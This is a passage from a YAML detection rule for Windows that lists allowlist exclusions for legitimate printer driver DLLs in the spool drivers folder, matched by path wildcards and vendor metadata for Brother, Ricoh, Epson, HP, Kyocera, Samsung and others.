'ACFPDF.DLL'\n - 'CDINTF'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRPSMA80.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BROHLA5A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRLGCB0A_000C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRDSMA80.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRUICB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BROCHB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRENCB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRRICB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRPRF13A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BSQ70V.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BSQ70L.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\bsp15bI6.DLL\n exclusion_brother:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BR*.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BS*.DLL' # (BSP98NUI.DLL, BST200U6.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\bsp?????.DLL' # (bsp15bI6.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BRL?????_??-??.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PT*.DLL'\n Company:\n - 'Brother Industries Ltd.'\n - 'Brother Industries, Ltd.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PRTRes.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PRTDrvUI_SF.dll\n exclusion_hprt:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PRTRes.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PRTDrvUI_SF.dll'\n Company:\n - 'HPRT'\n - 'Xiamen Hanin Electronic Technology Co.,Ltd.'\n OriginalFileName:\n - 'PRTRes.dll'\n - 'PRTDrvUI.dll'\n InternalName:\n - 'PRTRes.dll'\n - 'PRTDrvUI'\n Product:\n - 'HPRT Resource DLL'\n - 'HPRT Driver UI'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNFRA56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNdrv56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNui56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRAENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZEBENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZEBui56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRAdrv56.dll\n exclusion_euro_plus:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZDN???5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???drv5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???ENG5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???FRA5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???ui5?.dll' # ZDNui56.DLL, PNXui56.dll, ZEBui56.dll, BRAui56.dll, TCOui56.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zdn*.dll' # zdnPMU.dll / zdnPMS.dll / zdnPM64U.dll\n Company: 'Euro Plus d.o.o.'\n Product:\n - 'Thermal Printers Driver'\n - 'Windows Printer Driver'\n\n exclusion_euro_plus_xpl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Tools?PLx64.dll' # ToolsEPLx64.dll / ToolsZPLx64.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ToolsCPCLx64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ToolsKIOSKx64.dll'\n Description|contains: 'Tools Library' # EPL/CPL/ZPL/CPCL Tools Library\n InternalName|contains: 'Tools' # EPL/CPL/ZPL/CPCL Tools\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jcd.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jus.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jgs.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcd.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcj.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricipp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcj.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcd.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICFAX64UI.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RIC662X.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RIC562K.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica5Xct.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\watermark.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\headerfooter.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\overlaywatermark.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\jobhook.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\borderline.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\popup.dll\n exclusion_ricoh:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric*.dll' # (ricipp.dll, RICFAX64UI.dll, RIC662X.dll, RIC562K.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric*.exe' # (ricu0htl.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\0riu0???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RD*.dll' # (RD01Kd64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mfricr??.dll' # (mfricr64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIA*.DLL' # (RIAFUI1.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\watermark.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\headerfooter.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\overlaywatermark.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\jobhook.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\borderline.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\popup.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E?????64.DLL' # (E424UI64.DLL, E424RE64.DLL, E224UI64.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eng????.DLL' # eng53Ku\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fra????.DLL' # (fra50Fu.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GLS*.DLL' # (GLS603L.DLL, GLS503K.DLL, GLS603C.DLL, GLS603WU.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Infa4dgs.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SPC*.DLL' # (SPC82d64.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\rc4man??.dll' # (rc4man64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\trackid??.dll' # (trackid64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIP*.DLL' # (RIPSRES.DLL, RIPSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SP??????.dll' # (SP430d64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\MP??????.dll' # (MPC22d64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NRG*.DLL' # (NRG53EWU.dll, NRG53EX.DLL, NRG53EZU.DLL, NRG511WU.DLL, NRG511X.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\IFX*.DLL' # (IFXSEP64.EXE, IFXSHLNK64.DLL)\n Company:\n - 'RICOH'\n - 'RICOH COMPANY'\n - 'RICOH COMPANY, LTD'\n - 'RICOH COMPANY,LTD.'\n - 'RICOH Company, Ltd.'\n - 'RICOH CO.,Ltd.'\n - 'Ricoh Co., Ltd.'\n - 'RICOH Corp'\n - 'Agfa Monotype Corp.'\n - 'Monotype Imaging Inc.'\n\n exclusion_ricoh_without_infos:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric?????.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\0riu0???.dll' # (0riu03ur.dll)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXUI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXMI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXGI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EBAPIX64.DLL\n exclusion_seiko_epson:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E*.dll' # (EP7UIP00.DLL, EPSET64.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E_*' # (E_YMAIUAE.DLL, E_YERSKKE.DLL, E_YBEWKKE.DLL, E_YBA7KKE.DLL, E_34ULC1BE.DLL, E_33BCS1BE.EXE)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz??.xrs' # (sehmpzir.xrs)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz??.dll' # (sehmpziu.dll)\n Company:\n - 'SEIKO EPSON CORPORATION'\n - 'SEIKO EPSON CORP.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\mxdwdrv.dll\n # On Windows 8.1, MXDWDRV.dll is signed via catalogue.\n exclusion_mxdwdrv_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mxdwdrv.dll'\n Company: 'Microsoft Corporation'\n #InternalName: 'MXDWDRV.DLL'\n OriginalFileName: 'MXDWDRV.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PSCRIPT5.DLL\n # On Windows 8, PSCRIPT5.DLL is signed via catalogue.\n exclusion_pscript5_signed:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PSCRIPT5.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\?_PSCRIPT5.DLL' # (d_pscript5.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PDFILLPSCRIPT5.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'PSCRIPT5.DLL'\n # 5115cb182da89d2366709f553bf82f41826d2520ca6f9c99b10c23098522d9e3\n exclusion_ssm1:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ss??m.dll' # (ssi2m.dll, ssi5m.dll, ssk4m.dll, ssm1m.dll)\n OriginalFileName: 'PSCRIPT.DLL'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PS5UI.DLL\n # On Windows 8, PSCRIPT5.DLL is signed via catalogue.\n exclusion_ps5ui_signed:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PS5UI.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\*PS5UI.DLL' # (PDFILLPS5UI.DLL, pdf995ps5ui64.dll)\n Company: 'Microsoft Corporation'\n OriginalFileName: 'PS5UI.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UniDrvUI.dll\n # On Windows 8.1, UniDrvUI.DLL is signed via catalogue.\n exclusion_unidrvui_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UniDrvUI.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIDRVUI.DLL'\n OriginalFileName: 'UNIDRVUI.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UNIDRV.DLL\n # On Windows 8.1, UNIDRV.DLL is signed via catalogue.\n exclusion_unidrv_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UNIDRV.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIDRV.DLL'\n OriginalFileName: 'UNIDRV.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UNIRES.DLL\n # On Windows 8.1, UNIRES.DLL is signed via catalogue.\n exclusion_unires_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UNIRES.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIRES.DLL'\n OriginalFileName: 'UNIRES.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PrintConfig.dll\n exclusion_printconfig:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PrintConfig.dll'\n Company: 'Microsoft Corporation'\n #InternalName: 'PRINTCONFIG.DLL'\n OriginalFileName: 'PRINTCONFIG.DLL'\n exclusion_tsprint:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\tsprint.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'TSPRINT.DLL'\n\n exclusion_mxdwdui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mxdwdui.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mxdwdui.dll'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxr1m.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2m.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mdu.dll\n exclusion_pscript_windows_2003:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sx*dll' # (sxr1m.dll, sxp2m.dll, sxp2mdu.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sr*.dll' # (srp3m.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\YOUNGI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ss?6c.dll' # (ssl6c.dll, sst6c.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\spd__.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Thml4.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ssp1mdu.dll' # (ssp1mdu.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ml285*.dll' # (ml285pdu.dll, ml285pd.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\usp02.dll'\n Company: 'Windows (R) Server 2003 DDK provider'\n\n exclusion_hp_fax:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP*_FaxPCSendRenderPlugin.dll'\n Company: 'HP Inc.'\n OriginalFileName: 'FaxPCSendRenderPlugin.dll'\n\n exclusion_null_size:\n # We must use size: '-1'\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ADUIGP.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fpmvpr_ui.dll'\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mu2.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mu.dll\n exclusion_xerox_missing_pe_info:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sxp2mu2.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sxp2mu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\FX6?????-?_????.XRS' # (FX6BAALT-4_2052.XRS, FX6BAALT-4_1042.XRS, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\FX6?????-?.XRS' # (FX6BEALS-1.XRS, FX6SOALT-4.XRS, ...)\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__J_1.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_W.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_W.dll\n exclusion_konica_minolta_missing_pe_info:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOB__J_1.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOAYXJ_W.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOBJUJ_W.dll'\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n exclusion_longhorn:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\51FBE.Dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\51FBEX64.Dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OPUCU001.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GIE???.DLL' # (GIE6AD.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\R?E6??.DLL' # (R8E6AD.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LKNEW4*.Dll' # (LKNEW4.Dll, LKNEW4E.DLL, LKNEW4UI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SV1NPTPC.DLL'\n Company:\n - 'Windows (R) Codename Longhorn DDK provider'\n - 'Windows (R) Win 7 DDK provider'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_Y.DLL\n exclusion_monotype:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIC???c.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOA???_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OK*.DLL' # (OKIXL.DLL, OKBBAXD.DLL, OKIPCL.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.EXE' # (KOAYQJ_W.EXE)\n Company:\n - 'Monotype Imaging, Inc.'\n - 'Monotype Imaging Inc.'\n exclusion_okidata:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\O???_U?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OP??????.DLL' # (seen OPHCWNXT.DLL, opjobinf.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OK*.DLL' # (OKPSUI.DLL, OKBL_UI.DLL)\n Company:\n - 'Oki Data Corporation'\n - 'Oki Data Corportation'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64xps.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64enus.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64dlg.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy2073_x64gui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy2073_x64gui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpcst140.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpmux083.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpcdmc64.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpbmtxr31.dll\n exclusion_hp:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hp*.dll' # (HPFUI50.DLL, hpcst140.DLL, HP1006U.DLL , hpmdp196.dll, hpcui196.dll, hpipr7sm.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cioum.dll'\n Company:\n - 'Monotype Imaging Inc.'\n - 'Hewlett-Packard Corporation'\n - 'Hewlett Packard Corporation'\n - 'HP'\n - 'Hewlett-Packard'\n - 'Hewlett-Packard ' # additional space at the end...\n - 'Hewlett-Packard Company'\n - 'HP Inc.'\n\n exclusion_hp_without_company:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPM????????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpm??????.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpm?????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpbcfgre.DLL'\n OriginalFileName:\n - 'HPM????????.dll' # (seen HPM1210FPSU.dll, HPM1210FPSD.dll)\n - 'HPM??????.dll' # (HPM1210SD.dll)\n - 'hpm?????.dll' # (hpmsl140.dll)\n - 'hpbcfgre.DLL'\n\n exclusion_hp_without_infos:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpcc????.DLL' # (hpcc6140.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpixpsui.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpcp????.dll' # (hpcpp255.dll, hpcpn170.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpzpi???.DLL' # (hpzpi5k4.DLL, hpzpi4wm.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_software_2000:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP1006M?.DLL' # HP1006MP.dll / HP1006MT.dll\n Company: 'Software 2000 Limited'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KFUC409U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KFUU409U.DLL\n exclusion_kyocera:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KM??????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KF??????.DLL' # (KFUU643C.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KMPipe??.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KY*.DLL' # (KYFONT4.DLL, KYRES14.DLL, KyUPUI.dll, KyURes.dll, KyURTA.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KAU?????.DLL' # (KAUU34JU.DLL)\n Company:\n - 'KYOCERA MITA'\n - 'KYOCERA Document Solutions Inc.'\n - 'Kyocera Mita Europe B.V.'\n OriginalFileName:\n - 'KF??????.dll' # (KFUU643C.dll)\n - 'KM??????.dll'\n - 'KM??????' # (KMPD50F9)\n - 'KX??????.dll' # (KXUU42AJ.dll)\n - 'Kc?????.DLL'\n - 'kmPipe.dll'\n - 'OEMResources.dll'\n - 'ky*.dll' # (kyfont4.dll, kyres14.dll, KyUPUI.dll, KyURes.dll, KyURTA.dll)\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXE6MD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\R1E6AD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXE6KAD.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXEXNPCM.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GXEXNDRV.DLL\n exclusion_destiny:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GXE*.DLL' # (GXEXNDRV.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\R?E6*.DLL' # (R8E6AU.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GIE6??.DLL' # (GIE6AU.DLL)\n Description:\n - 'DESTINY Color Printer Driver Graphics'\n - 'DESTINY Color Printer Driver GUI'\n - 'Destiny Technology Corporation'\n - 'Spooler Setup DLL'\n - 'Destiny Corporation'\n - 'WinStyler Printer Driver'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EF658756.dll\n exclusion_imaging:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF658756.DLL'\n Description: 'Fiery Driver(TM) UI Plugin'\n OriginalFileName: 'OEMPLUGE.DLL'\n InternalName: 'OEMPLUGE.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpltglr6.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpltcfg6.dll\n # Windows 2000 era HP drivers.\n exclusion_hp_designjet_nt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hplt*' # (hpltuint.dll, hpltcfg6.DLL, hpltglr6.DLL, HPLTRPL10.DLL, hpltui5.dll, HPLTRPL9.EXE)\n Company: 'Hewlett-Packard Corporation, Microsoft Corporation'\n Product: 'HP DesignJet Series Printer Driver'\n\n exclusion_samsung_electronics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NetFax??64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\s*'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xp*.dll' # (xp3260n.dll, xp3260mu.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ssp4mdu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us003du.dll'\n Company:\n - 'Samsung Electronics Co., Ltd.'\n - 'Samsung Electronics'\n - ''\n - 'Printer driver - Interface module'\n - 'Samsung Research Center, Moscow'\n OriginalFileName:\n - 'itdrvn.dll'\n - 'itdrvDU.DLL'\n - 'ssMUIDLL.dll'\n - 'ColorFB6.dll'\n - 'UsbIO.dll'\n - 'st4fxdrv.dll'\n - 'NETFAX??.DLL'\n - 'GetSNMP.dll'\n exclusion_samsung_universal:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005?.exe' # (us005a.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005??.exe' # (us005dr.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005?.dll' # (us005n.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005??.dll' # (us005an.dll, us005pi.dll, us005ua.dll, ...)\n Company: ''\n Description:\n - 'Samsung Universal Print Driver Utility'\n - 'Printer driver - Driver Configuration Utility'\n - 'SmartCMS4.0'\n - 'Printer driver - Interface module'\n - 'Printer driver - Resource module'\n - 'Printer driver - UI core module'\n - 'Popup Pipe Server'\n - 'ColorFB6 Dynamic Link Library'\n - 'AsyncUI Server Interface'\n - 'DllRunne Application'\n - 'CommonUs Dynamic Link Library'\n - 'Get Printer information using Network and USB port'\n exclusion_sharp:\n ImageLoaded:\n # (SU2EUPV7.DLL, SU2EGC.DLL , SU2EUR.DLL, SU2EUSR.DLL, SS0XU.DLL, ...)\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GF0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GN0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SF0EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SD3BU.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GF0EU.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\GH7EUC.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\SN0XU.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\S*.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SHAR_RES.dll'\n - 